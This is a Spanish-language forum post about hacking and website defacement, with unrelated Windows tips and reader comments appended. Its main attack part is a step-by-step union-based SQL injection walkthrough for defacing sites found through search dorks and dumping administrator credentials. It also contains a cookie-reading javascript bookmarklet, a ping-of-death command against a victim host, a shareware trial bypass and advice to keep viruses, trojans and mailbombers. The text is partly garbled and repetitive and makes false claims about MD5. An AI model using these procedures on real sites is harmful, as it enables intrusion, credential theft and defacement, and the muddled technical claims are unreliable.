El post que buscas se encuentra eliminado, pero este también te puede interesar

el hacking y el deface??? algunas dudas.

hola e aqui mi segundo post en donde se aclaran algunas dudas acerca del hacking que creo un usuario y yo entrabamos en desacuerdo con nuestras opiniones jeje.



Entonces que es un Hacker?.


Si hacemos esta pregunta a alguien de la calle, probablemente conteste con un insulto. En nuestro país
este fenómeno no es bien conocido muy bien todavía.Los verdaderos Hackers nunca comentan nada de sus trabajos y si lo hacen, suelen utilizar apodos para no ser descubiertos. Si es un principiante, solo deseara recopilar información y lo copiara.
Estos individuos se llaman LAMER y son rápidamente expulsados de los heroicos guerreros de la red.
Existen al menos cinco tipos de Virus conocidos hasta ahora, esto no quiere decir que están todos,
seguramente mientras escribo estas líneas habrá surgido algún que otro engendro mas sofisticado. Pero
básicamente son estos : * Virus de arranque o Virus de Boot.
* Virus de Macro.
* Virus de ficheros.
* Virus polimorficos.
* Virus multiparte.
El perfil del Hacker
Un perfil idóneo prácticamente no existe, pero si un acercamiento. El Hacker es alguien compulsivo y
obsesivo por acumular conocimientos. Es extrovertido e investiga todo lo relacionado con la electrónica y
la informática. Es el tipo de personas que suelen abrir todos los aparatos de consumo de casa o lee los
ficheros de su ordenador hasta modificarlos para ver que sucede. Un buen Hacker se apunta lo aprendido y no lo difunde con una sonrisa de oreja a oreja, como un idiota. Se calla. Es mejor para poder proseguir.
Si es cierto que al Hacker, le entusiasma todo lo que rodea la tecnología, la telefonía celular, los ordenadores, las tarjetas de credito electrónicas o los Satélites. Normalmente lee demasiadas revistas y estudia pesados libros de técnica Los gurus


Son los maestros y enseñan a los futuros Hackers. Normalmente se trata se personas adultas, me refiero adultas , porque la mayoría de Hackers son personas jóvenes, que tienen amplia experiencia sobre los
sistemas informáticos o electrónicos y están de alguna forma hay, para enseñar a o sacar de cualquier duda al joven iniciatico al tema. Es como una especie de profesor que tiene a sus espaldas unas cuantas medallitas que lo identifican
como el mejor de su serie. El guru no esta activo, pero absorve conocimientos ya que sigue practicando, pero para conocimientos
propios y solo enseña las técnicas mas basicas. SON SEGURAS LAS PAGINAS WEB SOBRE HACKING Algunas de ellas pueden resultar peligrosas e inseguras, pero no todas. Es cierto que las paginas sobre
Hacking, pueden resultar una muy buena fuente de información para los « novatos «, pero existen algunas paginas, creadas por personas con vagas intenciones, que colocan en ellas utilidades dañinas como Virus
o cookies ES SEGURO EL CORREO ELECTRÓNICO En absoluto, el correo electrónico
no es nada seguro. A través de el se pueden recibir ficheros « pegados « indeseables. Además el correo electrónico puede ser interceptado y leído por los Lamers, que emplean Sniffers, programas capaces de interceptar correo electrónico entre otros. QUE HERRAMIENTAS SON IMPRESCINDIBLES
PARA EL « HACKER « El Hacker necesita herramientas que le faciliten el trabajo en la red. Entre estas herramientas destacan los sniffers, escaneadores y programadores de tarjetas inteligentes. También se recomienda poseer algún
Mailbombing y Nukenabber para enfrentarse a aquellos que solo actúan por fastidiar. tambien un buen virus bajo la manga
La ingeniería social es quizás la base de un Hacker, para obtener los datos o lo que le interesa por medio de una conversación y de personas


El truco de Simply es hasta la fecha el mas sencillo y el mas elegante hasta la fecha. Este truco se puede hacer de forma manual o automática, esto es, a través de Software o Hardware. Hasta la fecha en que se están escribiendo estas líneas, este truco ha conseguido burlar perfectamente
cualquier tipo de contador DSS o similar, ya que se trata de “ congelar “ el tiempo del reloj fuera de los
ficheros INI y no registrarlos. Dicho de otra manera, antes de arrancar el sistema operativo hay que introducirse en la BIOS y modificar
la fecha, guardando siempre relación. Esto quiere decir que si se bloquea el día 5, el ordenador
siempre deberá registrar que esta en el día 5. Como se sabe, los contadores pueden detectar cambios
inferiores de fecha, pero no igualdades, y como hasta la fecha no se controla la hora y los minutos, el truco esta servido.
Con este método han caído todos los últimos programas del mercado hasta la fecha, palabra.
Nota : No se pretende promocionar el truco Simply ni ninguno de los expuestos en este capitulo, de modo que
quien lo ejecute quedara a responsabilidad suya el “ trequear “ el Shareware y de nada responde el autor o autores de esta obra, el empleo de este truco u otros descritos. Al
no existir copia ni animo de lucro, no existe piratería. Queda dicho. ahora mostraremos algunas formas de encriptacion bastante utiles * MD5.....este algoritmo esta desarrollado por el grupo RSA y es un intento de probar con otros sistemas criptográficos que no empleen claves. El algoritmo desarrollado es capaz de obtener 128 bits a partir de un determinado texto. Como es lógico hasta el momento no se sabe cuales son las operaciones matemáticas
a seguir, pero hay alguien que dice que es mas que probable que se basen en factores de números primos.
postada no les digan a nadie pero son secuencias en primos en factor euler ahora esto les gustara Espiaremos una comunicación
primero sin usar ningún tipo de protección y después con un cliente SSH. Primero dejamos nuestro sniffer escuchando todos los paquetes TCP nuestra propia red. Y nos loggearemos a una cuenta de Messenger usando un servicio en línea como ebbudy o la que gusten y analizaremos el trafico. Terminando de loggearnos checamos el Logg file que se crea al marcar la casilla de “Enable Loggining”, y busquemos entre sus entrañas. Después de buscar un rato en los paquetes TCP, nos encontramos con una linda cookie que crea ebuddy al loggearnos. Como verán esta mi mail tan claro como el agua (el cual es falso jiji) y un lindo hash con la contraseña, que por lo menos ahora viajan en hash, en el primer Messenger que saco Yahoo no hacia ni eso… Esto no aclara el hecho que es importante que nadie pueda husmear en la campo data de nuestros paquetes, digo es como si mandaras cartas y cualquier cartero pervertido pudiera ver lo que dice sin ningún inconveniente. Ahora hagamos lo mismo pero usaremos el putty para conectarnos a un servidor SMTP usando el Secure Shell Observando uno de los paquetes nos damos cuenta que el campo data no es comprensible ya que esta encriptado, lo cual pone mas difícil las cosas, dependiendo del cliente/servidor la comunicación estará encriptada en RSA de 64,128, 256 o hasta 1024bits XSS
es un ataque basado en la explotacion de vulnerabilidades del sistema de validacion de HTML incrustado Sucede cuando hay un mensaje o una ruta en la URL del navegador o en una cookie. Para saber el contenido de una cookie, sin usar ningun tipo de iecv o addin para tu navegador, puedes usar el siguiente script de jasildbg. Solo coloca TODO lo que esta en color negro en la barra de direcciones, y presiona Enter. Una vez dentro se puede modificar la cookie a tu antojo. Si pones cancelar la cookie se borrara. el uso de la libreria cURL un usuario malintencionado, podria al recibir tu cookie, entrar a la pagina, y dejarla en cache, para que el atacante cuando quiera, pueda entrar como tu, sin siquiera necesitar tu contraseña. Este codigo (muy peligroso) borra todo el contenido de la pagina en cuestion, y escribe otra cosa:


javascript:for(var g in document.cookie.split (';'))void(prompt("Valor de cookie "+document.cookie.split (';')[g].split (’=')[0],document.cookie.split(’;')[g].split(’=')[1]));alert (”Cookies:n”+document.cookie.replace(/;/,”rn”)); Una vez dentro se puede modificar la cookie a tu antojo. Si pones cancelar la cookie se borrara. el uso de la libreria cURL un usuario malintencionado, podria al recibir tu cookie, entrar a la pagina, y dejarla en cache, para que el atacante cuando quiera, pueda entrar como tu, sin siquiera necesitar tu contraseña. Este codigo (muy peligroso) borra todo el contenido de la pagina en cuestion, y escribe otra cosa:


¿Qué es Deface?
El Deface / Defacing / Defacement es la modificación de una página web sin autorización del dueño de la misma. Primero hay que tener un buen dorks SQL, por ejemplo. “allinurl: .php?id= “ Sin las comillas. Ese Dork es el más básico pero hay muchísimos más, todo es con tal de ir mirando. Bueno ya hemos encontrado una, www.web.com/noticia.php?id=34 Ahora para saber si es vulnerable, le tenemos que quitar el 34, y ponerle ‘. Quedaría a si: www.web.com/noticias.php?id=’ Si nos sale un error mysql , tipo este ; Warning: mysql_error(): supplied argument is not a valid MySQL-Link resource in /usr/home/xxxX/public_html/_sys/general_functions.php on line 5 Lo principal es; -1+union+all+select+0,1 Quedaría así ; www.web.com/noticias.php?id=-1+union+all+select+0,1 Ara toca ir buscando, hasta que se te quite los errores, y te salgan números. Para ir buscando tienes que ir añadiendo números , ejemplo: www.web.com/noticias.php?id=-1+union+all+select+0,1,2,3,4,5,6,7-- Siempre al final de cada numero pon “--“ [Dos guiones] sin las comillas. No siempre acaba en 7, puede acabar en 100, 200, quien sabe. A mí, me ha salido los números en 7, y me ha tirado el 4, 6 y 7. Ahora toca coger uno de ellos, el que sea, yo cojo el 4. Ara tenemos que hacer lo siguiente: Si as elegido el 4, borras el numero 4 y pones “table_name” sin las comillas y al final pones; +from+information_schema.tables— Y nos quedaría a si: www.web.com/noticias.php?id=- 1+union+all+select+0,1,2,3,table_name,5,6,7+from+information_schema.tables — Ahora se nos ha cambiado el 4 por CHARACTER_SETS. Que es lo que normal mente sale al principio. Ara nos toca buscar tablas como “admin, root, login, miembro, member, user, usuario, administrador, etc. “Y aviso, no es lo mismo admin que Admin. Me explico, a lo mejor con admin no te sale y con Admin sí. Para buscar las tablas tienes que borrar los dos guiones finales y poner ; +1,1-- Y ir cambiando el primer 1 por los siguientes números, ejemplo: www.web.com/noticias.php?id=- 1+union+all+select+0,1,2,3,table_name,5,6,7+from+information_schema.tables+ 1,1-- www.web.com/noticias.php?id=- 1+union+all+select+0,1,2,3,table_name,5,6,7+from+information_schema.tables+ 2,1-- www.web.com/noticias.php?id=- 1+union+all+select+0,1,2,3,table_name,5,6,7+from+information_schema.tables+ 3,1-- A si hasta que te salga algo importante. Nunca suele pasar de 100 pero bueno, nunca se sabe. A mí me ha tirado la tabla admin en 17. Ahora vamos hacer lo siguiente: Borras +information_schema.tables+3,1-- , quedara a si: www.web.com/noticias.php?id=- 1+union+all+select+0,1,2,3,table_name,5,6,7+from y pones +admin , pones admin por que es la tabla importante que te ha tirado, quedaría así: www.web.com/noticias.php?id=- 1+union+all+select+0,1,2,3,table_name,5,6,7+from+admin & ara en table_name hay que ir probando palabras como; “Login, admin, password, clave, pass, user, email, mail , etc... “ Quedaría a si: www.web.com/noticias.php?id=- 1+union+all+select+0,1,2,3,admin,5,6,7+from+admin A mí el user me lo ha tirado en “admin” y la contraseña en “clave”. Ahora borras lo que has puesto en 4, y pones : concat(nombre,0x3a3a,pass) Quedaría a si: www.web.com/noticias.php?id=-1+union+all+select+0,1,2,3, concat(admin,0x3a3a,clave),5,6,7+from+admin Os explico, admin es la tabla donde nos ha dado el usuario, 0x3a3a es :: en hexadecimal y clave es la tabla donde nos a tirado el password. Y Listo ya tenemos usuario y password. Ahora toca buscar el panel Ping De La Muerte. Esta tecnica no es propia de un Hacker ya que unicamente sirve para tirar un servidor o sea que se desconecta de Internet y esto puede representar grandes perdidas a una empresa. Con esto solo os quiero decir que aunque aqui os lo explicare no es cuestion que lo useis por Internet atacando servidores. ping muy grande y producira su caida. Para ejecutar este ataque solo tenemos que escribir : c:>ping -l 65510 victima.com
Whois.
La utilidad Whois, al igual que Finger es muy comun en Unix y no esta disponible en Win95/98 pero comos somos asi de listos saldremos del apuro. Tambien sirve para pedir informacion de un servidor pero no el igual que Finger, ya que se diferencian en el tipo de informacion, el finger se suele utilizar mucho para buscar direcciones de correo mientras que el Whois, para averiguar informacion sobre un servidor en concreto.
Para usar esta utilidad, ejecutamos el Telnet y nos dirigimos a un host muy especial:
c:>telnet whois.internic.net
Por supuesto Internic, una empresa privada norte ameriacana que se encarga de controlar los dominios de Internet, y podemos usar su base de datos para pedir informacion sobre un servidor. Cuando conectemos a la base de datos de Internic, escribimos "Whois nombre_ del_servidor" y nos sacara la informacion. Winipcfg.
Ejecutando este comando, nos saldra una ventana windows informandonos de los diferentes valores de nuestra red. Realmente util para verificar la configuracion. Encriptando Nuestro Correo.
Conviene encriptar nuestro correo, sobre todo si esta relacionado con el hacking, ya que asi nadie podra saber que pone y acusarnos de nada. Siempre podemos alegar "Privacidad en los Datos" . Al igual que antes hay varios paquetes de PGP para mail.
Sugerencias Para Un Mejor Hacking.
Aqui hablare sobre algunas ideas que pueden potenciar el hacking en Win95/98 y la creacion de nuevas herramientas.
- Programas troyanos que capturen el password del acceso a Internet.
- Programas para IP-Spoof.
- Creacion de herramientas de redes para Win95/98.
- Wardialers.
- Programas para atacar otros Win95/98 (DoS).
- Nuevas Suites.
- Programas crackeadores del passwd.
- Programas criptograficos.
- Programas eliminadores de ficheros de forma segura.
- Puertas traseras.
Liberar memoria RAM
Liberar memoria RAM. Tras haber ejecutado una o múltiples aplicaciones o juegos que hagan uso intensivo de los recursos del sistema, habremos detectado que Windows queda algo "tocado", mucho mas lento. Esto es debido a que los restos de las aplicaciones bloquean parte de la RAM que han utilizado, ocasionando lo que se llama "fragmentación de memoria". Mediante un pequeño script podemos liberar esa memoria , forzando al ordenador a descargar el contenido de la memoria al archivo de intercambio de forma que recargue de nuevo toda la información activa en la memoria y deseche la información no útil, esto lo haremos de la siguiente forma:
Abrimos el bloc de notas de Windows y dependiendo de la memoria de nuestro ordenador escribiremos los siguientes valores:
Si tienes menos de 128 Mb de memoria RAM, escribes Mystring=(16000000)
Si tienes 128 Mb de memoria RAM o más escribes Mystring=(80000000)
Ahora guarda este archivo en el lugar que quieras, con el nombre "liberar.vbe" (no te olvides poner la extensión .vbe ya que el nombre no importa puedes poner el que quieras).
Ahora hacemos doble clic sobre el archivo que acabamos de crear y windows refrescará la memoria RAM.
Mayor velocidad de acceso a los programas Aunque tu equipo disponga de suficiente memoria RAM y puedas trabajar con varios programas sin problemas el sistema siempre utiliza el Kernel para enviar y recibir archivos del archivo de paginación del disco duro, por este motivo la velocidad del ordenador se frena, si ya dispones de memoria RAM suficiente sigue estos pasos:
Haz clic sobre el botón Inicio y a continuación sobre Ejecutar, escribe regedit y pulsa el botón Aceptar
Ahora te desplazas por la siguiente cadena:
HKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet/Control/Session Manager/Memory Management

Busca en el panel derecho la entrada DisablePagingExecutive y haz doble clic sobre ella.
En la ventana que aparece cambia el valor de 0 y pones 1 luego pulsa el botón Aceptar y reinicia tu ordenador, ahora conseguirás mas velocidad de acceso a los programas porque utilizará menos el disco duro.
Arrancar y Apagar mas rápido el PC
Conseguirás rapidez en el arranque y apagado de tu ordenador, siguiendo los pasos que a continuación te proponemos:
Haz doble clic sobre "Mi PC"
Entra en la unidad C
Selecciona el menú "Ver/Opciones"
Selecciona la pestaña "Ver" Selecciona todos los "Archivos/Aplicar" Haz un clic sobre el botón derecho sobre el archivo MSDOS.SYS Después, ves a "Propiedades" y elimina la marca de "sólo lectura y oculto/Aplicar" Selecciona el archivo y ábrelo con el bloc de notas Sobre "Opciones" ya sólo tendrás que escribir BootDelay=0 Finalmente, ponle los atributos de "sólo lectura y oculto".


Eliminar archivos que no se dejan borrar Con frecuencia nos encontramos que al intentar borrar un archivo, XP nos contesta que no se puede eliminar porque el archivo está siendo usado por otro programa, este problema suele ocurrir cuando intentamos borrar archivos en formato *.avi. Normalmente el problema suele estar producido porque algún avi está dañado y el codec correspondiente (el cual se invoca siempre en vista previa) se cuelga y no lo suelta.
Recordad que AVI no es un tipo de fichero, sino que es un "contenedor" de formato de video, y que en la cabecera interna, lleva realmente grabado el tipo de video que es y por tanto el sistema sabe a que codec debe llamar.
Para solucionar este problema abriremos una ventana de comandos Hacemos clic en el botón inicio y luego sobre Ejecutar A continuación escribimos cmd y pulsamos el botón Aceptar Cerramos todos los programas que tengamos abiertos menos la pantalla de MS-DOS que acabamos de abrir. Volvemos ha hacer clic en el botón Inicio y luego sobre Ejecutar Escribimos Taskmgr.exe y pulsamos el botón Aceptar Volvemos a pulsar el botón Inicio y luego sobre Ejecutar
Escribimos explorer.exe y pulsamos el botón Aceptar. Volvemos a la ventana de comandos e iremos a la carpeta donde tengamos el archivo que queremos eliminar y escribiremos: del dejamos un espacio y escribimos el nombre_archivo
Volvemos de nuevo al administrador de tareas, Archivo > Nueva tarea y escribimos "explorer.exe" (sin comillas) para reestablecer el escritorio. Ya podemos cerrar el administrador de tareas y la ventana de comandos.
Atajos del teclado en Windows Vista Alt + Tab = Combinación para cambiar entre las distintas ventanas que tengamos abiertas.
Ctrl + Alt + Tab = Hace lo mismo que Alt + Tab pero si soltamos las teclas no se cerrara la ventana.
Ctrl + Alt + Supr = Abre una ventana desde la que podemos, bloquear el equipo, cambiar de usuario, cerrar sesión, cambiar una contraseña e iniciar el administrador de tareas.
Ctrl + Mayúsculas + Esc = Abre el administrador de tareas de Windows.
Ctrl + Mayúsculas + Enter = Abre un programa como administrador.
Win = Abre el menú de inicio.
Win + F1 = Abre la ayuda de Windows.
Win + 1 = Lanza la primera aplicación de la barra de inicio rápido, cambiando el numero 1 por el numero 2 abrirá la segunda aplicación de la barra de inicio rápido y así sucesivamente con todas las aplicaciones que tengamos en el menú.
Win + Tab = Activa el Flip 3D con el que movernos entre las ventanas viendo una vista previa. Cada pulsación sobre Tab que hagamos (manteniendo Win pulsada) cambiará a la siguiente ventana y al soltar, la ventana seleccionada se mostrará en el frente.
Ctrl + Win + Tab = Mantiene el Flip 3D después de liberar las teclas y podemos movernos entre las ventanas con las teclas de cursor.
Win + Espacio = Trae al frente la barra lateral.
Win + Pausa = Abre la sección de Sistema del panel de control.
Win + D = Muestra el escritorio, si volvemos a usarlo vuelve a su estado anterior.
Win + E = Abre el explorador de Windows.
Win + F = Abre el diálogo de búsqueda.
Win + G = Permite cambiar el foco entre los gadgets de la barra lateral.
Win + L = Bloquea el equipo.
Win + M = Minimizar todas las ventanas.
Mayúsculas + Win + M = Permite restaurar todas las ventanas.
Win + R = Abre el diálogo Ejecutar.
Win + T = Pone el foco en la barra de tareas, con la versión minimizada de la ventana activa seleccionada, mostrando la vista previa de la ventana. Podemos movernos entre las distintas ventanas pulsando de nuevo Win + T, o pulsando T sin soltar Win, o con las teclas de cursor.
Win + U = Centro de accesibilidad.
Win + X = Centro de movilidad de Windows.



bueno espero les sirva y ojo otra ves solo es una fuente de informacion y educacion y no me ago responsable del mal uso de esta, ya que es ilegal


espero comenten y deje puntos para seguir posteando.


10 comentarios - el hacking y el deface??? algunas dudas.

Usuario2112 -2
Los Hackers no usan windows utilizan sistemas libres con licencia gpl creen en la filosofia del open source. Les interesa mucho la seguridad informatica los hackers no se dedican a destuir las maquinas de los demas sino en crear. Los q buscan destruir son los Crakers. Eric Raymond creo parte de lo que es la filosofia Hacker!
Te aconsejo que mires el documental Hackers- Wizards of the Electronic Age fue sus comienzos no te guies por lo que aveces los demas dicen. Buena suerte!
Usuario2112
bepbrian dijo:
Usuario2112 dijo:Los Hackers no usan windows utilizan sistemas libres con licencia gpl creen en la filosofia del open source. Les interesa mucho la seguridad informatica los hackers no se dedican a destuir las maquinas de los demas sino en crear. Los q buscan destruir son los Crakers. Eric Raymond creo parte de lo que es la filosofia Hacker!
Te aconsejo que mires el documental Hackers- Wizards of the Electronic Age fue sus comienzos no te guies por lo que aveces los demas dicen. Buena suerte!


eso es lo q trato de aser entender a muchos, x eso puse este post para q se den una idea de lo q asen los crakers por que muchos entramos en desacuerdo con que es un hacker y un lammer ya que se confunde y para eso puse este post le al principo man, y si gracias x tu coment

Ok es bueno pero un deface no es bueno aveces difundirlo por que muchas otras personas utilizan la informacion para dañar sistemas. En todo caso es bueno difundir una solucion para defaces para que otra persona pueda solucionar ese problema en caso de encontrar el problema hacerlo saber... no difundirlo o tal ves despues cuando ya alla sido reparado. Ok no es nada!!
esteban22x
yo uso VMWare con distros fedora, openSUSE y Debian para conferencias , ademas tengo dual boot con Windows 7 y Lucid Linx, no manejo esto de los virus ya que no me llama la atencion , lo que me gusta es el deface pero mira en la sintaxis de una inyeccion no es necesario poner -- despues de la inyeccion es mas haciendo una inyeccion en ASP me di cuenta que tras de horas y horas de sacarme error MySQL lo que necesitaba era borrar el -- y me funciono, , comienzo diciendo que no me considero hacker ni a kacker llego , solo estoy interesado en aprender, ahora me he desviado mucho de este mundillo, por que estoy hasta el cuello con el MySQL , Oracle y PHP , (La U) , en fin ojala que no te borren pronto el post , pero te lo borraran las denuncias o un mod no tardan en llegar
markos089
como son pendejos un buen hacker usa cualquier OS PENDEJOS ESTUPIDOS!!!!
Apsychos
Los hackers más experimentados están más interesados en los sitemas Open Source porque les permiten examinarlos completamente y por la filosofía del moviemiento.